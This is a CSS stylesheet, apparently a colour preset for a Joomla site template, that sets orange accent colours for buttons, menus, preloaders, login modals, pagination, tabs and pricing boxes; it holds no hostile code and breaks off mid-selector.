.new-look .offcanvas-menu .sp-module ul >li .offcanvas-menu-toggler.collapsed:after {
  background: #eee none repeat scroll 0 0;
}
.new-look .offcanvas-menu .sp-module ul >li.active .offcanvas-menu-toggler:before {
  background: #fca224 none repeat scroll 0 0;
}
.new-look .offcanvas-menu .sp-module ul >li.active .offcanvas-menu-toggler:after {
  background: #fca224 none repeat scroll 0 0;
}
a {
  color: #fca224;
}
a:hover {
  color: #ea8a03;
}
.article-info >dt >i,
.article-info >dt >span.fa,
.article-info >dd >i,
.article-info >dd >span.fa {
  color: #fdb756;
}
.article-info >dt .voting-symbol span.star,
.article-info >dd .voting-symbol span.star {
  color: #fdb756;
}
.article-info >dt .sp-rating span.star:hover:before,
.article-info >dt .sp-rating span.star:hover ~ span.star:before,
.article-info >dd .sp-rating span.star:hover:before,
.article-info >dd .sp-rating span.star:hover ~ span.star:before {
  color: #fc970b;
}
.article-info >dt .ajax-loader:before,
.article-info >dd .ajax-loader:before {
  color: #ea8a03;
}
#offcanvas-toggler >i {
  color: #fdb756;
}
#offcanvas-toggler >i:hover {
  color: #fca224;
}
.sp-pre-loader {
  background: rgba(255,255,255,0.64);
}
.sp-pre-loader .sp-loader-clock {
  border: 3px solid #333333;
}
.sp-pre-loader .sp-loader-clock:after {
  background-color: #333333;
}
.sp-pre-loader .sp-loader-clock:before {
  background-color: #333333;
}
.sp-pre-loader .sp-loader-circle {
  border: 4px solid rgba(51,51,51,0.4);
}
.sp-pre-loader .sp-loader-circle:after {
  border-top-color: #333333;
}
.sp-pre-loader .loader-flip:after {
  background-color: rgba(51,51,51,0.8);
}
.sp-pre-loader .sp-loader-bubble-loop {
  background-color: #333333;
}
.sp-pre-loader .sp-loader-bubble-loop:before {
  background-color: rgba(51,51,51,0.5);
}
.sp-pre-loader .sp-loader-bubble-loop:after {
  background-color: rgba(51,51,51,0.5);
}
.sp-pre-loader .circle-two > span,
.sp-pre-loader .circle-two > span:before,
.sp-pre-loader .circle-two > span:after {
  border: 2px solid #333333;
}
.sp-pre-loader .wave-two li {
  background-color: #333333;
}
.sp-pre-loader .sp-loader-audio-wave {
  background: linear-gradient(#333333,#333333) 0 50%, linear-gradient(#333333,#333333) 0.625em 50%, linear-gradient(#333333,#333333) 1.25em 50%, linear-gradient(#333333,#333333) 1.875em 50%, linear-gradient(#333333,#333333) 2.5em 50%;
}
.sp-pre-loader .sp-loader-with-logo .line {
  background: #333333;
}
.btn-primary,
.button,
.btn-readmore,
.sppb-btn-primary,
.vm-button-correct {
  border-color: #fc9e1a;
  background-color: #fca224;
  background-color: rgba(252,162,36,0.9);
  color: #fff;
  outline: 0;
}
.btn-primary:hover,
.btn-primary:focus,
.button:hover,
.button:focus,
.btn-readmore:hover,
.btn-readmore:focus,
.sppb-btn-primary:hover,
.sppb-btn-primary:focus,
.vm-button-correct:hover,
.vm-button-correct:focus {
  border-color: #d17b03;
  background-color: #fc9910;
  color: #fff;
}
.btn-primary.sppb-btn-outline,
.button.sppb-btn-outline,
.btn-readmore.sppb-btn-outline,
.sppb-btn-primary.sppb-btn-outline,
.vm-button-correct.sppb-btn-outline {
  border: 2px solid #fca224;
  color: inherit;
  background-color: transparent;
}
.btn-primary.sppb-btn-round.focus,
.btn-primary.sppb-btn-round.active,
.btn-primary.sppb-btn-round:focus,
.btn-primary.sppb-btn-round:active,
.btn-primary.sppb-btn-outline:hover,
.btn-primary.sppb-btn-outline.focus,
.btn-primary.sppb-btn-outline.active,
.btn-primary.sppb-btn-outline:focus,
.btn-primary.sppb-btn-outline:active,
.btn-primary.open > .dropdown-toggle.sppb-btn-outline,
.button.sppb-btn-round.focus,
.button.sppb-btn-round.active,
.button.sppb-btn-round:focus,
.button.sppb-btn-round:active,
.button.sppb-btn-outline:hover,
.button.sppb-btn-outline.focus,
.button.sppb-btn-outline.active,
.button.sppb-btn-outline:focus,
.button.sppb-btn-outline:active,
.button.open > .dropdown-toggle.sppb-btn-outline,
.btn-readmore.sppb-btn-round.focus,
.btn-readmore.sppb-btn-round.active,
.btn-readmore.sppb-btn-round:focus,
.btn-readmore.sppb-btn-round:active,
.btn-readmore.sppb-btn-outline:hover,
.btn-readmore.sppb-btn-outline.focus,
.btn-readmore.sppb-btn-outline.active,
.btn-readmore.sppb-btn-outline:focus,
.btn-readmore.sppb-btn-outline:active,
.btn-readmore.open > .dropdown-toggle.sppb-btn-outline,
.sppb-btn-primary.sppb-btn-round.focus,
.sppb-btn-primary.sppb-btn-round.active,
.sppb-btn-primary.sppb-btn-round:focus,
.sppb-btn-primary.sppb-btn-round:active,
.sppb-btn-primary.sppb-btn-outline:hover,
.sppb-btn-primary.sppb-btn-outline.focus,
.sppb-btn-primary.sppb-btn-outline.active,
.sppb-btn-primary.sppb-btn-outline:focus,
.sppb-btn-primary.sppb-btn-outline:active,
.sppb-btn-primary.open > .dropdown-toggle.sppb-btn-outline,
.vm-button-correct.sppb-btn-round.focus,
.vm-button-correct.sppb-btn-round.active,
.vm-button-correct.sppb-btn-round:focus,
.vm-button-correct.sppb-btn-round:active,
.vm-button-correct.sppb-btn-outline:hover,
.vm-button-correct.sppb-btn-outline.focus,
.vm-button-correct.sppb-btn-outline.active,
.vm-button-correct.sppb-btn-outline:focus,
.vm-button-correct.sppb-btn-outline:active,
.vm-button-correct.open > .dropdown-toggle.sppb-btn-outline {
  background-color: rgba(252,162,36,0.9) !important;
  border-color: rgba(0,0,0,0.2) !important;
  color: #fff;
  outline: 0;
}
.btn-primary.sppb-btn-3d,
.button.sppb-btn-3d,
.btn-readmore.sppb-btn-3d,
.sppb-btn-primary.sppb-btn-3d,
.vm-button-correct.sppb-btn-3d {
  border-bottom-color: rgba(0,0,0,0.25);
}
.btn-primary.sppb-btn-3d:hover,
.btn-primary.sppb-btn-3d:focus,
.button.sppb-btn-3d:hover,
.button.sppb-btn-3d:focus,
.btn-readmore.sppb-btn-3d:hover,
.btn-readmore.sppb-btn-3d:focus,
.sppb-btn-primary.sppb-btn-3d:hover,
.sppb-btn-primary.sppb-btn-3d:focus,
.vm-button-correct.sppb-btn-3d:hover,
.vm-button-correct.sppb-btn-3d:focus {
  background: rgba(252,162,36,0.95);
  border-bottom-color: rgba(0,0,0,0.3);
}
.btn-primary.sppb-btn-3d:focus,
.btn-primary.sppb-btn-3d.focus,
.btn-primary.sppb-btn-3d:active,
.btn-primary.sppb-btn-3d.active,
.btn-primary.open > .dropdown-toggle.sppb-btn-3d,
.button.sppb-btn-3d:focus,
.button.sppb-btn-3d.focus,
.button.sppb-btn-3d:active,
.button.sppb-btn-3d.active,
.button.open > .dropdown-toggle.sppb-btn-3d,
.btn-readmore.sppb-btn-3d:focus,
.btn-readmore.sppb-btn-3d.focus,
.btn-readmore.sppb-btn-3d:active,
.btn-readmore.sppb-btn-3d.active,
.btn-readmore.open > .dropdown-toggle.sppb-btn-3d,
.sppb-btn-primary.sppb-btn-3d:focus,
.sppb-btn-primary.sppb-btn-3d.focus,
.sppb-btn-primary.sppb-btn-3d:active,
.sppb-btn-primary.sppb-btn-3d.active,
.sppb-btn-primary.open > .dropdown-toggle.sppb-btn-3d,
.vm-button-correct.sppb-btn-3d:focus,
.vm-button-correct.sppb-btn-3d.focus,
.vm-button-correct.sppb-btn-3d:active,
.vm-button-correct.sppb-btn-3d.active,
.vm-button-correct.open > .dropdown-toggle.sppb-btn-3d {
  background: #fcad3d;
}
.sppb-btn-default,
.btn.sppb-btn-default {
  background-color: rgba(255,255,255,0.75);
  border-color: #666666;
  color: #666666;
}
.sppb-btn-default:hover,
.sppb-btn-default:focus,
.btn.sppb-btn-default:hover,
.btn.sppb-btn-default:focus {
  background-color: rgba(255,255,255,0.95);
  border-color: #fca224;
  color: #fca224;
}
.sppb-btn-default.sppb-btn-outline,
.btn.sppb-btn-default.sppb-btn-outline {
  border: 2px solid #666666;
  color: inherit;
  background-color: transparent;
}
.sppb-btn-default.sppb-btn-outline:hover,
.sppb-btn-default.sppb-btn-outline.focus,
.sppb-btn-default.sppb-btn-outline.active,
.sppb-btn-default.sppb-btn-outline:focus,
.sppb-btn-default.sppb-btn-outline:active,
.sppb-btn-default.open > .dropdown-toggle.sppb-btn-outline,
.btn.sppb-btn-default.sppb-btn-outline:hover,
.btn.sppb-btn-default.sppb-btn-outline.focus,
.btn.sppb-btn-default.sppb-btn-outline.active,
.btn.sppb-btn-default.sppb-btn-outline:focus,
.btn.sppb-btn-default.sppb-btn-outline:active,
.btn.sppb-btn-default.open > .dropdown-toggle.sppb-btn-outline {
  background-color: transparent !important;
  color: #ea8a03;
  border: 2px solid #fca224 !important;
  box-shadow: none;
}
.sppb-btn-default.sppb-btn-3d,
.btn.sppb-btn-default.sppb-btn-3d {
  border-bottom-color: #666666;
}
.sppb-btn-default.sppb-btn-3d:hover,
.sppb-btn-default.sppb-btn-3d:focus,
.btn.sppb-btn-default.sppb-btn-3d:hover,
.btn.sppb-btn-default.sppb-btn-3d:focus {
  background-color: transparent;
  color: #ea8a03;
  border-bottom-color: #fca224;
}
.sppb-btn-default.sppb-btn-3d:active,
.sppb-btn-default.sppb-btn-3d.active,
.sppb-btn-default.open > .dropdown-toggle.sppb-btn-3d,
.btn.sppb-btn-default.sppb-btn-3d:active,
.btn.sppb-btn-default.sppb-btn-3d.active,
.btn.sppb-btn-default.open > .dropdown-toggle.sppb-btn-3d {
  border-bottom: 2px solid #fca224;
  background-color: transparent;
}
.btn-link,
.sppb-btn-link {
  color: #fdb756;
}
.btn-link:hover,
.btn-link:focus,
.sppb-btn-link:hover,
.sppb-btn-link:focus {
  color: #fca224;
  text-decoration: none;
}
.btn-readmore {
  color: #fff;
}
.btn-readmore:hover,
.btn-readmore:focus {
  color: #fff;
}
.btn-dark,
.sppb-btn-dark {
  color: #fff;
  border-color: #4d4d4d;
  background-color: rgba(51,51,51,0.72);
}
.btn-dark:hover,
.btn-dark:focus,
.sppb-btn-dark:hover,
.sppb-btn-dark:focus {
  color: #eee;
  border-color: #333;
  background-color: #424242;
  background-color: rgba(51,51,51,0.87);
}
.btn-dark.sppb-btn-outline,
.sppb-btn-dark.sppb-btn-outline {
  border-color: #333;
}
.btn-dark.sppb-btn-outline:hover,
.btn-dark.sppb-btn-outline.focus,
.btn-dark.sppb-btn-outline.active,
.btn-dark.sppb-btn-outline:focus,
.btn-dark.sppb-btn-outline:active,
.btn-dark.open > .dropdown-toggle.sppb-btn-outline,
.sppb-btn-dark.sppb-btn-outline:hover,
.sppb-btn-dark.sppb-btn-outline.focus,
.sppb-btn-dark.sppb-btn-outline.active,
.sppb-btn-dark.sppb-btn-outline:focus,
.sppb-btn-dark.sppb-btn-outline:active,
.sppb-btn-dark.open > .dropdown-toggle.sppb-btn-outline {
  color: #eee;
  border-color: #333;
  background-color: #535353;
  background-color: rgba(51,51,51,0.8);
}
.btn-dark.sppb-btn-3d,
.btn-dark.sppb-btn-3d:hover,
.btn-dark.sppb-btn-3d.focus,
.btn-dark.sppb-btn-3d:focus,
.btn-dark.sppb-btn-3d:active,
.btn-dark.sppb-btn-3d.active,
.btn-dark.open > .dropdown-toggle.sppb-btn-3d,
.sppb-btn-dark.sppb-btn-3d,
.sppb-btn-dark.sppb-btn-3d:hover,
.sppb-btn-dark.sppb-btn-3d.focus,
.sppb-btn-dark.sppb-btn-3d:focus,
.sppb-btn-dark.sppb-btn-3d:active,
.sppb-btn-dark.sppb-btn-3d.active,
.sppb-btn-dark.open > .dropdown-toggle.sppb-btn-3d {
  border-bottom-color: #262626;
}
.btn-light,
.sppb-btn-light {
  color: #f5f5f5;
  border-color: #f5f5f5;
  border-color: rgba(255,255,255,0.77);
  background-color: rgba(255,255,255,0.05);
}
.btn-light:hover,
.btn-light:focus,
.sppb-btn-light:hover,
.sppb-btn-light:focus {
  border-color: #fff;
  color: #fff;
  background-color: rgba(255,255,255,0.15);
}
.btn-light.sppb-btn-outline,
.sppb-btn-light.sppb-btn-outline {
  color: #f5f5f5;
  border-color: #f5f5f5;
  border-color: rgba(255,255,255,0.77);
}
.btn-light.sppb-btn-outline:hover,
.btn-light.sppb-btn-outline.focus,
.btn-light.sppb-btn-outline:focus,
.btn-light.sppb-btn-outline:active,
.btn-light.sppb-btn-outline.active,
.btn-light.open > .dropdown-toggle.sppb-btn-outline,
.sppb-btn-light.sppb-btn-outline:hover,
.sppb-btn-light.sppb-btn-outline.focus,
.sppb-btn-light.sppb-btn-outline:focus,
.sppb-btn-light.sppb-btn-outline:active,
.sppb-btn-light.sppb-btn-outline.active,
.sppb-btn-light.open > .dropdown-toggle.sppb-btn-outline {
  border-color: #fff;
  color: #fff;
}
.btn-light.sppb-btn-3d,
.sppb-btn-light.sppb-btn-3d {
  border-bottom-color: rgba(255,255,255,0.77);
}
.btn-light.sppb-btn-3d:hover,
.btn-light.sppb-btn-3d.focus,
.btn-light.sppb-btn-3d:focus,
.btn-light.sppb-btn-3d:active,
.btn-light.sppb-btn-3d.active,
.btn-light.open > .dropdown-toggle.sppb-btn-3d,
.sppb-btn-light.sppb-btn-3d:hover,
.sppb-btn-light.sppb-btn-3d.focus,
.sppb-btn-light.sppb-btn-3d:focus,
.sppb-btn-light.sppb-btn-3d:active,
.sppb-btn-light.sppb-btn-3d.active,
.sppb-btn-light.open > .dropdown-toggle.sppb-btn-3d {
  border-bottom-color: #fff;
}
.btn-flex,
.sppb-btn-flex {
  color: #fff;
  border-color: #fdcd89;
  background-color: rgba(255,255,255,0.25);
  box-shadow: 0 2px 5px rgba(0,0,0,0.15);
}
.btn-flex:hover,
.btn-flex:focus,
.sppb-btn-flex:hover,
.sppb-btn-flex:focus {
  border-color: #fdc26f;
  color: #fff;
  background-color: rgba(252,162,36,0.7);
}
.btn-flex.sppb-btn-outline,
.sppb-btn-flex.sppb-btn-outline {
  color: #fff;
  border-color: #fdcd89;
  background-color: rgba(255,255,255,0.25);
}
.btn-flex.sppb-btn-outline:hover,
.btn-flex.sppb-btn-outline.focus,
.btn-flex.sppb-btn-outline:focus,
.btn-flex.sppb-btn-outline:active,
.btn-flex.sppb-btn-outline.active,
.btn-flex.open > .dropdown-toggle.sppb-btn-outline,
.sppb-btn-flex.sppb-btn-outline:hover,
.sppb-btn-flex.sppb-btn-outline.focus,
.sppb-btn-flex.sppb-btn-outline:focus,
.sppb-btn-flex.sppb-btn-outline:active,
.sppb-btn-flex.sppb-btn-outline.active,
.sppb-btn-flex.open > .dropdown-toggle.sppb-btn-outline {
  border-color: #fdc26f;
  color: #fff;
  background-color: rgba(252,162,36,0.7);
}
.btn-flex.sppb-btn-3d,
.btn-flex.sppb-btn-3d:hover,
.btn-flex.sppb-btn-3d.focus,
.btn-flex.sppb-btn-3d:focus,
.btn-flex.sppb-btn-3d:active,
.btn-flex.sppb-btn-3d.active,
.btn-flex.open > .dropdown-toggle.sppb-btn-3d,
.sppb-btn-flex.sppb-btn-3d,
.sppb-btn-flex.sppb-btn-3d:hover,
.sppb-btn-flex.sppb-btn-3d.focus,
.sppb-btn-flex.sppb-btn-3d:focus,
.sppb-btn-flex.sppb-btn-3d:active,
.sppb-btn-flex.sppb-btn-3d.active,
.sppb-btn-flex.open > .dropdown-toggle.sppb-btn-3d {
  border-bottom-color: #fdb756;
}
.light >i {
  color: #fed7a2;
}
.light:hover i {
  color: #fee2bb;
}
ul.social-icons >li a:hover,
ul.social-icons >li a:hover > i {
  -webkit-transition: all 300ms;
  transition: all 300ms;
  color: #fee2bb;
}
.login .title i.pe,
.registration .title i.pe {
  color: #fdcd89;
}
.ap-login a i.pe,
.ap-signin a i.pe {
  color: #fdcd89;
}
.ap-modal-login .modal-dialog {
  color: #000000;
}
.ap-modal-login .title i.pe {
  color: #fdcd89;
}
.ap-modal-login .modal-content .modal-body .forget-name-link a {
  color: #000000 !important;
}
.ap-modal-login .modal-content .modal-body .forget-name-link a:hover {
  color: #fca224 !important;
}
.ap-modal-login .modal-content .modal-footer a:hover {
  color: #fca224 !important;
}
.view-profile .select-menu select {
  display: block;
}
.view-profile button:focus {
  outline: none;
}
.view-profile a[title="Cancel"] {
  background-color: #888888;
  color: #fff;
}
.view-profile a[title="Cancel"]:hover {
  background-color: #6f6f6f;
}
.ap-my-account-menu .signin-img-wrap i.pe {
  color: #fee2bb;
}
.ap-my-account-menu .dropdown-menu ul.menu >li a {
  color: #000000 !important;
}
.ap-my-account-menu .dropdown-menu ul.menu >li a:hover {
  background-color: rgba(252,162,36,0.8);
  color: #fff !important;
}
.ap-my-account-menu .dropdown-menu ul.menu >li a:hover::before {
  color: #fee2bb;
}
.ap-my-account-menu .dropdown-menu ul.menu >li:last-child a {
  color: #fca224;
}
.ap-my-account-menu .dropdown-menu ul.menu >li:last-child a:hover {
  background-color: rgba(252,162,36,0.8);
  color: #fff;
}
.ap-my-account-menu .dropdown-menu ul.menu >li:last-child a:hover i {
  color: #fff;
}
.ap-my-account-menu .dropdown-menu ul.menu >li:last-child a i {
  color: #fca224;
}
.ap-my-account-menu .dropdown-menu ul.menu >li.active > a {
  background-color: rgba(252,162,36,0.8);
  color: #fff !important;
}
.login-wrapper >i.pe,
.registration-wrapper >i.pe,
.reset-wrapper >i.pe,
.remind-wrapper >i.pe {
  color: rgba(252,162,36,0.07);
}
.login-wrapper >i.pe {
  color: rgba(85,85,85,0.02);
}
#sp-top-bar ul.social-icons >li a:hover,
#sp-top-bar ul.social-icons >li a:hover > i {
  -webkit-transition: all 300ms;
  transition: all 300ms;
  color: #fcad3d;
}
#sp-top-bar.onepage {
  box-shadow: inset 0 1px 0px rgba(0,0,0,0.05), inset 0 -1px 0px rgba(0,0,0,0.1);
}
#sp-top-bar.onepage .sp-contact-info li i {
  color: #e08403;
}
#sp-top-bar.onepage .ap-login a i.pe,
#sp-top-bar.onepage .ap-signin a i.pe {
  color: #e08403;
}
.sp-contact-info li a:hover {
  color: #fdc26f;
}
.sp-contact-info li i {
  color: #fdc26f;
}
.sp-module-content .mod-languages ul.lang-block li.lang-active a i {
  color: #fdcd89;
}
ol.breadcrumb li a:hover {
  color: #fed7a2;
}
.sp-module ul >li >a,
.sppb-addon-module ul >li >a {
  color: #1a1a1a;
}
.sp-module ul >li >a:hover,
.sppb-addon-module ul >li >a:hover {
  color: #fca224;
}
.sp-module.white .sppb-addon-content ol >span,
.sppb-addon-module.white .sppb-addon-content ol >span {
  color: #e2e2e2;
}
.sp-module.white .sppb-addon-content ol li,
.sppb-addon-module.white .sppb-addon-content ol li {
  color: #e2e2e2;
}
.sp-module.white .sppb-addon-content ol li a,
.sppb-addon-module.white .sppb-addon-content ol li a {
  color: #fff;
}
.sp-module.white .sppb-addon-content ol li a:hover,
.sppb-addon-module.white .sppb-addon-content ol li a:hover {
  color: #fed7a2;
}
.sp-module.dark ul >li >span >a,
.sppb-addon-module.dark ul >li >span >a {
  color: #fcad3d;
}
.sp-module.dark ul >li >span >a:hover,
.sppb-addon-module.dark ul >li >span >a:hover {
  color: #fdcd89;
}
.sp-module.dark ul >li >a,
.sppb-addon-module.dark ul >li >a {
  color: #fdb756 !important;
}
.sp-module.dark ul >li >a:hover,
.sppb-addon-module.dark ul >li >a:hover {
  color: #fed7a2 !important;
}
.sp-module .latestnews >div >a,
.sppb-addon-module .latestnews >div >a {
  color: #000000;
}
.sp-module .latestnews >div >a:hover,
.sppb-addon-module .latestnews >div >a:hover {
  color: #fca224;
}
.sp-module ul.category-module >li >a,
.sp-module .relateditems >li >a,
.sppb-addon-module ul.category-module >li >a,
.sppb-addon-module .relateditems >li >a {
  color: #fdb756;
}
.sp-module ul.category-module >li >a >div.related-date,
.sp-module .relateditems >li >a >div.related-date,
.sppb-addon-module ul.category-module >li >a >div.related-date,
.sppb-addon-module .relateditems >li >a >div.related-date {
  color: #999999;
}
.sp-module ul.category-module >li >a >div.related-date >i,
.sp-module .relateditems >li >a >div.related-date >i,
.sppb-addon-module ul.category-module >li >a >div.related-date >i,
.sppb-addon-module .relateditems >li >a >div.related-date >i {
  color: #fdcd89;
}
.sp-module ul.category-module >li span,
.sp-module ul.category-module >li p,
.sp-module .relateditems >li span,
.sp-module .relateditems >li p,
.sppb-addon-module ul.category-module >li span,
.sppb-addon-module ul.category-module >li p,
.sppb-addon-module .relateditems >li span,
.sppb-addon-module .relateditems >li p {
  color: #999999;
}
.sp-module ul.category-module >li span >i,
.sp-module ul.category-module >li p >i,
.sp-module .relateditems >li span >i,
.sp-module .relateditems >li p >i,
.sppb-addon-module ul.category-module >li span >i,
.sppb-addon-module ul.category-module >li p >i,
.sppb-addon-module .relateditems >li span >i,
.sppb-addon-module .relateditems >li p >i {
  color: #fdcd89;
}
.sp-module ul.category-module >li a.mod-articles-category-title,
.sppb-addon-module ul.category-module >li a.mod-articles-category-title {
  color: #000000;
}
.sp-module ul.category-module >li a.mod-articles-category-title:hover,
.sppb-addon-module ul.category-module >li a.mod-articles-category-title:hover {
  color: #fca224;
}
.sp-module .tagscloud .tag-name,
.sppb-addon-module .tagscloud .tag-name {
  color: #666666;
}
.sp-module .tagscloud .tag-name:hover,
.sppb-addon-module .tagscloud .tag-name:hover {
  background: #fcad3d;
  border-color: #fca224;
  color: #fff;
}
.tag-category ul.category li h3 >a {
  color: #595959;
}
.tag-category ul.category li h3 >a:hover {
  color: #fca224;
}
.tags a.label {
  background-color: rgba(45,45,45,0.45);
}
.tags a.label:hover {
  background: #fcad3d;
}
.tags >span >i {
  color: #c4c4c4;
}
.tags:hover >span >i {
  color: #919191;
}
.sp-simpleportfolio .sp-simpleportfolio-filter > ul.simple > li > a {
  color: #1a1a1a;
}
.sp-simpleportfolio .sp-simpleportfolio-filter > ul.simple > li > a:hover {
  color: #fca224;
}
.sp-simpleportfolio .sp-simpleportfolio-filter > ul.simple > li.active > a {
  color: #fca224;
}
.sp-simpleportfolio .sp-simpleportfolio-filter > ul.simple > li.active > a:hover {
  color: #fca224;
}
.sp-simpleportfolio .sp-simpleportfolio-filter > ul.simple > li span.simple-divider {
  color: #feedd4;
}
.sp-simpleportfolio .sp-simpleportfolio-filter > ul.flex > li.active > a,
#mod-sp-simpleportfolio .sp-simpleportfolio-filter > ul.flex > li.active > a {
  background: #fca224;
}
.sp-simpleportfolio .sp-simpleportfolio-filter > ul.flex > li > a:hover,
#mod-sp-simpleportfolio .sp-simpleportfolio-filter > ul.flex > li > a:hover {
  background: #fca224;
}
.sp-simpleportfolio .sp-simpleportfolio-item .sp-simpleportfolio-btns a,
#mod-sp-simpleportfolio .sp-simpleportfolio-item .sp-simpleportfolio-btns a {
  background-color: #fca224;
  background-color: rgba(252,162,36,0.8);
}
.sp-simpleportfolio .sp-simpleportfolio-item .sp-simpleportfolio-btns a:hover,
#mod-sp-simpleportfolio .sp-simpleportfolio-item .sp-simpleportfolio-btns a:hover {
  background-color: #fca224;
  box-shadow: 0 1px 3px rgba(0,0,0,0.3);
}
.sp-simpleportfolio .sp-simpleportfolio-meta .sp-module:hover h3 > i.fa {
  color: #fca224;
}
.sp-simpleportfolio-info .sp-simpleportfolio-tags i.fa {
  color: #fdb756;
}
input[type="text"]:focus {
  border: 1px solid #fca224;
}
.search input#mod-search-searchword:focus,
.search input#search-searchword:focus,
.search input#mod_virtuemart_search:focus {
  border: 1px solid #fca224;
}
.search:before {
  color: #fdb756;
}
.search:hover:before,
.search:focus:before,
.search:active:before {
  color: #1a1a1a;
}
.search .btn-toolbar button {
  background: #fca224;
}
.post-format-masonry > i {
  background-color: #fca224;
  background-color: rgba(252,162,36,0.7);
}
.post-format {
  background-color: #fca224;
  background-color: rgba(252,162,36,0.9);
}
.entry-link,
.entry-quote {
  background-color: #fca224;
  background-color: rgba(252,162,36,0.9);
}
blockquote {
  border-color: #fca224;
}
.sp-comingsoon body {
  background-color: #fc970b;
}
.sp-comingsoon body #sp-comingsoon ul.social-icons >li a:hover,
.sp-comingsoon body #sp-comingsoon ul.social-icons >li a:hover i {
  color: #fff;
}
.sp-comingsoon body.with-bckg-img a.logo {
  background: rgba(20,20,20,0.45);
}
.sp-comingsoon body.with-bckg-img .days .number,
.sp-comingsoon body.with-bckg-img .hours .number,
.sp-comingsoon body.with-bckg-img .seconds .number,
.sp-comingsoon body.with-bckg-img .minutes .number {
  border: 1px solid rgba(255,255,255,0.5);
  background-color: rgba(0,0,0,0.2);
}
.sp-comingsoon body.with-bckg-img .social-icons {
  background-color: rgba(0,0,0,0.2);
}
.pagination>li>a,
.pagination>li>span {
  color: #000000;
}
.pagination>li>a:hover,
.pagination>li>a:focus,
.pagination>li>span:hover,
.pagination>li>span:focus {
  color: #000000;
}
.pagination>.active>a,
.pagination>.active>span {
  border-color: #fca224;
  background-color: #fca224;
}
.pagination>.active>a:hover,
.pagination>.active>a:focus,
.pagination>.active>span:hover,
.pagination>.active>span:focus {
  border-color: #fca224;
  background-color: #fca224;
}
.sppb-addon h3.sppb-addon-title {
  color: #1a1a1a;
}
.sppb-addon h3.sppb-addon-title:after {
  background: #fdb756;
}
.sppb-panel-default .sppb-panel-heading .sppb-panel-title >i {
  color: #666666;
}
.sppb-panel-default .sppb-panel-heading.active,
.sppb-panel-default .sppb-panel-heading.active:before {
  color: #fca224;
}
.sppb-panel-default .sppb-panel-heading.active .sppb-panel-title,
.sppb-panel-default .sppb-panel-heading.active:before .sppb-panel-title {
  color: #fca224;
}
.sppb-panel-default .sppb-panel-heading.active .sppb-panel-title >i,
.sppb-panel-default .sppb-panel-heading.active:before .sppb-panel-title >i {
  color: #fdb756;
}
.sppb-panel-primary {
  border: none;
}
.sppb-panel-primary >.sppb-panel-heading {
  background-color: #fca224;
}
.sppb-panel-flex >.sppb-panel-heading .sppb-panel-title >i {
  color: #666666;
}
.sppb-panel-flex >.sppb-panel-heading:after {
  color: #808080;
}
.sppb-panel-flex >.sppb-panel-heading.active {
  border-bottom: 1px solid #fca224;
}
.sppb-panel-flex >.sppb-panel-heading.active:after {
  color: #fca224;
}
.sppb-panel-flex >.sppb-panel-heading.active .sppb-panel-title >i {
  color: #fca224;
}
.sppb-panel-flex >.sppb-panel-heading +.sppb-panel-collapse > .sppb-panel-body {
  border-bottom: 1px solid #fca224;
}
.sppb-addon-countdown.flex .sppb-countdown-number {
  background-color: #fca224;
  border: 2px solid rgba(0,0,0,0.2);
  text-shadow: 1px 1px 1px rgba(0,0,0,0.3);
}
.entry-header h1 a,
.entry-header h2 a {
  color: #000000;
}
.entry-header h1 a:hover,
.entry-header h1 a:focus,
.entry-header h2 a:hover,
.entry-header h2 a:focus {
  color: #fca224;
}
.entry-header h1:after,
.entry-header h2:after {
  background: #fdb756;
}
.html-style span {
  background: #fdb34c;
}
ul.site-list li {
  color: #000000;
}
ul.site-list li i {
  color: #fdb34c;
}
.bullets .li-circle {
  color: #fca224;
}
.dropcaps .naked-drop span {
  color: #fca224;
}
.dropcaps .full-drop span {
  background: #fca224;
}
.sp-module .sp-module-title {
  color: #1a1a1a;
}
.sp-module .sp-module-title:after {
  background: #fdb756;
}
.cd-pagination li.active >a {
  background-color: #fca224;
  color: #fff;
}
.cd-pagination a {
  background-color: #fafafa;
}
.cd-pagination a:hover,
.cd-pagination a:focus {
  background-color: #fca224;
  color: #fff;
}
.cd-pagination a:active {
  background-color: #b76c03;
}
.sppb-addon-single-image .sppb-addon-content a .overlay >i:before {
  background-color: rgba(252,162,36,0.8);
}
.sppb-addon-single-image .sppb-addon-content a .overlay:after {
  background-color: rgba(51,51,51,0.25);
  box-shadow: inset 0 0 50px rgba(51,51,51,0.9);
}
.sppb-progress .sppb-progress-bar-default,
.sppb-progress .sppb-progress-bar.flex,
.sppb-progress .sppb-progress-bar.custom {
  background-color: #fca224;
}
.sppb-nav-tabs >li >a {
  color: #fca224;
}
.sppb-nav-tabs >li.active >a {
  color: #333333;
}
.flex .sppb-tab .sppb-nav-tabs >li.active >a {
  border-top-color: #fdb756;
}
.flex .sppb-tab .sppb-nav-tabs >li.active >a:hover,
.flex .sppb-tab .sppb-nav-tabs >li.active >a:focus {
  border-top-color: #fdb756;
}
.sppb-nav-modern >li >a {
  background: transparent;
  color: #333333;
}
.sppb-nav-modern >li.active >a {
  color: #fca224;
}
.sppb-nav-modern >li.active >a:hover,
.sppb-nav-modern >li.active >a:focus {
  color: #fca224;
}
.sppb-nav-lines >li >a {
  background: transparent;
}
.sppb-nav-lines >li >a >i {
  color: #666666;
}
.sppb-nav-lines >li >a:hover >i,
.sppb-nav-lines >li >a:focus >i {
  color: #333333;
}
.sppb-nav-lines >li.active >a,
.sppb-nav-lines >li.active >a:focus,
.sppb-nav-lines >li.active >a:hover {
  background-color: transparent;
  color: #fca224;
  border-bottom-color: #fca224;
}
.sppb-nav-lines >li.active >a >i,
.sppb-nav-lines >li.active >a:focus >i,
.sppb-nav-lines >li.active >a:hover >i {
  color: #fca224;
}
.sppb-nav-pills >li >a {
  color: #333333;
  background: transparent;
}
.sppb-nav-pills >li >a >i {
  color: #666666;
}
.sppb-nav-pills >li >a:hover >i,
.sppb-nav-pills >li >a:focus >i {
  color: #333333;
}
.sppb-nav-pills >li.active >a {
  background-color: transparent;
  color: #fca224;
  box-shadow: inset 0 0 0 1px #fca224;
}
.sppb-nav-pills >li.active >a >i {
  color: #fca224;
}
.sppb-addon-testimonial .sppb-addon-testimonial-rating i.fa-star {
  color: #fdb756;
}
.sppb-addon-testimonial .sppb-addon-testimonial-rating i.fa-star-o {
  color: #c0c0c0;
}
.pro-client-url {
  color: #fca224;
}
.sppb-pricing-box {
  box-shadow: inset 0 0 1px #999999;
}
.sppb-pricing-box.sppb-pricing-featured {
  background: transparent;
}
.sppb-pricing-box.sppb-pricing-featured .sppb-pricing-header {
  background-color: #fca224;
}
.sppb-pricing-box.sppb-pricing-featured .sppb-pricing-features {
  color: #000000;
}
.sppb-addon-latest-posts .latest-post .latest-post-inner div.img-wrapper,
